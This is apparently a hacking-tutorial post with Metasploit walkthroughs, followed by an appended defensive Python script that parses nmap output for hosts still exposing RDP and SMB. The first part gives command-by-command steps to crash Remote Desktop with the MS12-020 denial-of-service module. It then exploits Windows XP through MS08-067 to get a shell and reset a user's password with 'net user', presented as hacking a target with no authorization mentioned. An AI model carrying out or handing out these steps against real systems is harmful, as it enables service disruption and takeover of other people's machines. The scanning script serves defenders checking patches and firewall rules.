This tutorial is very general, and I will keep updating this post whenever I find exploits and have the time.
1. If 3389/tcp ms-term-serv is open, then using Metasploit you can cause the remote machine to reboot or stop this service.
$ msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf auxiliary(ms12_020_maxchannelids) > exploit
Now rescan the target computer; you will find that the ms-term-serv service is disabled.
2. Hacking Windows XP SP2/SP3 to get administrator access to the system. (The following exploit attacks port 445.)
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell
C:\Windows\System32\> net user
C:\Windows\System32\> net user userName password
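From the defender's side, both steps above depend on 3389/tcp or 445/tcp being reachable, so the rescan is also the way to confirm that a patch or firewall rule has taken effect. The script below is an added example, not part of the original post: it reads nmap grepable (`-oG`) output and lists hosts that still expose either service. The sample scan, host names and addresses are constructed, and the function names are hypothetical.

```python
import re

# Ports the two modules above target, labelled with the bulletin in each module name.
WATCHED = {("3389", "tcp"): "MS12-020 (RDP)", ("445", "tcp"): "MS08-067 (SMB)"}

# Constructed sample of `nmap -oG` output; addresses are documentation-range (RFC 5737).
SAMPLE_SCAN = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 192.0.2.10 (xp-lab)\tStatus: Up\n"
    "Host: 192.0.2.10 (xp-lab)\tPorts: 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-term-serv///\n"
    "Host: 192.0.2.11 ()\tPorts: 445/filtered/tcp//microsoft-ds///, "
    "3389/closed/tcp//ms-term-serv///\tIgnored State: closed (997)\n"
    "Host: 192.0.2.12 ()\tPorts: 80/open/tcp//http///, 3389/open/udp//unknown///\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)")


def exposed_services(grepable_text):
    """Return {host: [label, ...]} for hosts with a watched port in state 'open'."""
    findings = {}
    for line in grepable_text.splitlines():
        host = HOST_RE.match(line)
        if not host or "\tPorts: " not in line:
            continue  # comment lines and Status-only lines carry no port list
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            parts = entry.strip().split("/")
            if len(parts) < 3:
                continue  # malformed entry
            port, state, proto = parts[0], parts[1], parts[2]
            label = WATCHED.get((port, proto))
            # 'filtered' or 'closed' means a firewall or a stopped service is in the way
            if label and state == "open":
                findings.setdefault(host.group(1), []).append(label)
    return findings


def still_exposed(before, after):
    """Services open in both scans, i.e. the mitigation has not taken effect."""
    return {h: [s for s in svcs if s in after.get(h, [])]
            for h, svcs in before.items()
            if any(s in after.get(h, []) for s in svcs)}


if __name__ == "__main__":
    for host, services in exposed_services(SAMPLE_SCAN).items():
        print(host, "->", ", ".join(services))
```

Run `exposed_services` on a scan taken before a change and on one taken after it, then pass both results to `still_exposed` to see which hosts need more work.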